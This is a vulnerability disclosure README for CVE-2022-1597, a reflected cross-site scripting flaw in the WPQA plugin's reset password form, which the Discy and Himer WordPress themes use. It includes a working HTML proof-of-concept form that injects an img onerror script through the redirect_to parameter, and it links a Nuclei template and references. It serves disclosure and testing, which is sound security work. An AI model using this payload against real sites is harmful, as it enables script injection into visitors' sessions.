The plugin, used as a companion for the Discy and Himer themes, does not sanitise and escape a parameter on its reset password form which makes it possible to perform Reflected Cross-Site Scripting attacks# CVE-2022-1597
The plugin, used as a companion for the Discy and Himer themes, does not sanitise and escape a parameter on its reset password form which makes it possible to perform Reflected Cross-Site Scripting attacks
## Affected Plugins:
[WPQA](https://codecanyon.net/item/wpqa-builder-forms-addon-for-wordpress/25298161) < 5.4
## Affected Themes:
[DISCY](https://2code.info/discy-social-questions-and-answers-wordpress-theme/)
[HIMER](https://2code.info/himer-social-questions-and-answers-wordpress-theme/)
## POC:
```
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="user_mail" value="validEmail@domain.com" />
<input type="hidden" name="form_type" value="wpqa_forget" />
<input type="hidden" name="action" value="wpqa_ajax_password_process" />
<input type="hidden" name="redirect_to" value=""><img src=x onerror=alert(document.domain)>" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
```
## Nuclei Template:
[CVE-2022-1597.yaml](CVE-2022-1597.yaml)

## VIDEO POC:
https://www.youtube.com/watch?v=E2GRtf6prq8
### References:
https://wpscan.com/vulnerability/faff9484-9fc7-4300-bdad-9cd8a30a9a4e
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1597
[4.0K] /data/pocs/66065d06940f84a6799bf164b569779192c27945
├── [1.8K] CVE-2022-1597.yaml
├── [4.0K] files
│ └── [1.4M] photo.png
└── [1.4K] README.md
1 directory, 3 files